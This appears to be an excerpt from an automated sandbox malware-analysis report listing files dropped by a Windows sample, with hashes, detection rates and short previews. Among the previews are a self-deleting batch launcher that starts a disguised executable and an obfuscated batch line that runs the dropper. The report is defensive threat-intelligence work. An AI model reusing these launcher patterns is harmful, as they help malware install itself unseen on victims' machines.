                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Wed Jan 1 22:46:38 2025, 1st section name ".debug$S"
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1956
                                                                                                                                Entropy (8bit):4.5499946953412715
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:H2O9GXOA6DfHHwKBEN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:PAAwK+KluOulajfqXSfbNtmh1Z
                                                                                                                                MD5:E667F544C3CC6F7CFB664C7EEE14FB16
                                                                                                                                SHA1:17EDFD9584AD1AA7F4469A6CAABD6EF64E7F3BE7
                                                                                                                                SHA-256:172ECEB8D7871EE49D7E7C70643462EF5C92F4F94AC89CD7DADB21365E7F54A6
                                                                                                                                SHA-512:2B809F7256BA65C782D657DDBEA60FB8E8D8EEC752F71C228F43101AA6D385915596A41EB109DD5FADFB9C9737316742740651C28B9D2E9F915C77E07ED4A118
                                                                                                                                Malicious:false
                                                                                                                                Preview:L.....ug.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........<....c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES26F0.tmp.-.<....................a..Microsoft (R) CVTRES.c.=..cwd.C:\bridgemssurrogateintonet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):98304
                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):114688
                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25
                                                                                                                                Entropy (8bit):4.163856189774724
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:eXtsh84tDn:6cx
                                                                                                                                MD5:6A8857405E84ED5AF21E76D894C1F3C4
                                                                                                                                SHA1:A159206C1C6AA8C2F27B608E66B0B6BDFAD82D45
                                                                                                                                SHA-256:B8075363C6508FF17CC1E96920A927A14772F5111900DF0D53945AE9AC1D7431
                                                                                                                                SHA-512:715415194566126730F85EDA8FC009967E6D75D09CCCC0F683ACDD1D1D3002DAF7D6868AB0E59F2DA694443DBFE687DBB9327AC76DEF9AA52269B37E0C1AD047
                                                                                                                                Malicious:false
                                                                                                                                Preview:YKsNfCNM0su4C56ZADYwnAeFf
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):114688
                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):230
                                                                                                                                Entropy (8bit):5.362147102147485
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:hCijTg3Nou1SV+DEz9z7yfEYKOZG1wkn23fffpHK:HTg9uYDEz0fEyf3fpK
                                                                                                                                MD5:A6C82B324FE58FEA60CEC1C5A87DFE7D
                                                                                                                                SHA1:B9452C3B1D5C72130C8582CA1063C9326E3629C1
                                                                                                                                SHA-256:96D01C62185F169D367D3EF0ACA20C17BB73CCCD596FCF0BBB1A4467CFA9F0CF
                                                                                                                                SHA-512:4A51583F16EEAC027801A5FD21F1020662A01F0F97E8ADA7F2253D0C2DE977CDBADB96428A73BBF204AEBEABF11ED693BEB052E2AE35F24DFF91E0F995C583F9
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\xNnAMDzXoE.bat"
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):28672
                                                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):69632
                                                                                                                                Entropy (8bit):5.932541123129161
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: eP6sjvTqJa.exe, Detection: malicious, Browse
                                                                                                                                • Filename: 1znAXdPcM5.exe, Detection: malicious, Browse
                                                                                                                                • Filename: YGk3y6Tdix.exe, Detection: malicious, Browse
                                                                                                                                • Filename: U1jaLbTw1f.exe, Detection: malicious, Browse
                                                                                                                                • Filename: voed9G7p5s.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Etqq32Yuw4.exe, Detection: malicious, Browse
                                                                                                                                • Filename: KzLetzDiM8.exe, Detection: malicious, Browse
                                                                                                                                • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                                                                                                • Filename: aimware.exe, Detection: malicious, Browse
                                                                                                                                • Filename: ZZ2sTsJFrt.exe, Detection: malicious, Browse
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):69632
                                                                                                                                Entropy (8bit):5.932541123129161
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):85504
                                                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):85504
                                                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23552
                                                                                                                                Entropy (8bit):5.519109060441589
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32256
                                                                                                                                Entropy (8bit):5.631194486392901
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32256
                                                                                                                                Entropy (8bit):5.631194486392901
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23552
                                                                                                                                Entropy (8bit):5.519109060441589
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                File Type:MSVC .res
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1224
                                                                                                                                Entropy (8bit):4.435108676655666
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                Malicious:false
                                                                                                                                Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4608
                                                                                                                                Entropy (8bit):3.9147451735926455
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:6ApLPt2M7Jt8Bs3FJsdcV4MKe27xvqBHuOulajfqXSfbNtm:rPVPc+Vx9MxvkIcjRzNt
                                                                                                                                MD5:ED73DFEC33807770310F9DB4FE5DE568
                                                                                                                                SHA1:89A3F1E302752A232075CD51517E88F89B91D559
                                                                                                                                SHA-256:506FEE8CB6CB7ED4BCB144010453844ED347CB7DA4619A5B6BBAF0BE25CFB8A0
                                                                                                                                SHA-512:29958C4678E8C3EB65DF84B4754764530EC437BA2928AE130C047424EA1C0E2825091777649457CD6BD257E7ABEEDE7C25289C8096C5EF52F3EAFE5D2FF15D61
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with very long lines (681), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):681
                                                                                                                                Entropy (8bit):5.892072987222378
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:1eJtaMrkIh5vUHsKzUhpF/lnKbAkvqtBKEhE4NIw9+APh/rDNrhL8YY7DPlVM:10IMDMMKAT5F0StBvh9xPXhf6Plm
                                                                                                                                MD5:5453B5D619A5DA1FDE52552B89458BFC
                                                                                                                                SHA1:6616214BD9C91CBEB35C7C5DB71A895C71E53360
                                                                                                                                SHA-256:B10F23B7C7988371FA56093EF1A4409AF9A3599145F2BBDDC1A430FA85F2284C
                                                                                                                                SHA-512:ED2C532F21870739A178D562920D4AC3FA20AC16DFAD98CE09BF39AEEACF30D6D032C6859D8CACBC1EF41FF9DDB23472094375B9F2F5C34A78E680BFCE7CC04E
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Process:C:\Users\user\Desktop\544WP3NHaP.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):102
                                                                                                                                Entropy (8bit):5.148668694887557
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:jdSzzGWJvojIiDIWp4AyRNVMRbGsEcAtP1n:hiojD1wVQh+t9n
                                                                                                                                MD5:3577D367F55C11CA80F5C81DC9C28EF7
                                                                                                                                SHA1:EA6C1B88F826CC8BAD3B8641A34BEFC2F2767C03
                                                                                                                                SHA-256:24CA8EC54CE27306835A5FE5BFBD0C2931D10ABA593A8A8AD671C2A9C5225275
                                                                                                                                SHA-512:72AA0A5867B26FF5530F7E964A406A9DA12C2BFDCF60C2161E969F581107B1A46103D04167276D69158AB1AE0975DF22FB1E71E3E82A455F5EC9E75889002608
                                                                                                                                Malicious:false
                                                                                                                                Preview:%cxviAQtMKVhlIdY%%oudjvPH%..%bnG%"C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe"%HCMKyUCruJSOx%
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with very long lines (411), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):411
                                                                                                                                Entropy (8bit):5.859243709087893
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:ATPK1eC9QoW+owszyV6p4R2d0p6mDIUbS:AKN9qKHW4RRX2
                                                                                                                                MD5:89902E9996BA978C8D4617366CF48ECA
                                                                                                                                SHA1:38EB0CA0B342ED4DABB2DEF9DBDBEE3CE5E85CCE
